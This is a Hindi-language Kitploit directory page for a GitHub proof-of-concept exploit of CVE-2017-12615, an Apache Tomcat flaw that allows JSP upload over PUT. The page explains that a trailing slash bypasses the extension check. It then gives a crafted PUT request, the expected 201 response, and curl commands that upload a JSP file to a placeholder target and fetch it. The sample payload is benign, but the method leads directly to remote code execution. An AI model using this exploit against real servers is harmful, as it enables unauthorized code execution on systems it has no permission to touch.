Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/breaktoprotect/cve-2017-12615
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubbreaktoprotect/cve-2017-12615

CVE-2017-12615

POC Exploit for Apache Tomcat 7.0.x CVE-2017-12615 PUT JSP कमजोरी

रिपॉजिटरी देखें
1122126 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

चिया जुनयुआन की स्मृति में (https://packetstormsecurity.com/files/author/11924/)

POC CVE-2017-12615

Apache Tomcat 7.0.0 से 7.0.79 तक Windows पर चलने वाले POC शोषण; CVE-2017-12615 PUT JSP भेद्यता।

विवरण:

डिज़ाइन के अनुसार, Apache Tomcat सर्वर पर PUT विधि के माध्यम से JSP फ़ाइलें अपलोड करने की अनुमति नहीं है। यह संभवतः एक सुरक्षा उपाय है ताकि हमलावर JSP शेल अपलोड करके सर्वर पर रिमोट कोड निष्पादन प्राप्त न कर सके। हालांकि, अपर्याप्त जांच के कारण, हमलावर 7.0.{0 से 79} Tomcat सर्वरों पर रिमोट कोड निष्पादन प्राप्त कर सकता है जिन्होंने PUT को सक्षम किया है, बशर्ते वह Tomcat सर्वर पर एक विशेष रूप से तैयार HTTP अनुरोध का उपयोग करके PUT विधि का अनुरोध करे। लेकिन सच में, विशेष? कृपया।

शोषण विधि:

फ़ाइल नाम के एक्सटेंशन के पीछे '/' वर्ण जोड़कर, फ़ाइल एक्सटेंशन जांच को बायपास किया जा सकता है। बस इतना ही। तो, वास्तव में वह विशेष नहीं है।

अनुरोध विधि में शोषण:

अनुरोध

root@kitploit:~
PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85

<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>

सफल होने पर अपेक्षित प्रतिक्रिया

root@kitploit:~
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close

'curl' का उपयोग करके शोषण:

  1. एक .jsp फ़ाइल बनाएं (जैसे test.jsp):
root@kitploit:~
<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write  executed.</h3></body></html>"); %>
  1. लक्ष्य सर्वर पर curl कमांड चलाएं:
root@kitploit:~
curl -X PUT http://target-host-or-ip-address:port/test.jsp/ -d @- < test.jsp
  1. जांचें कि आपकी फ़ाइल लक्ष्य पते पर ब्राउज़ करके अपलोड हुई है या नहीं:
root@kitploit:~
curl http://target-host-or-ip-address:port/test.jsp
टूल डाउनलोड करें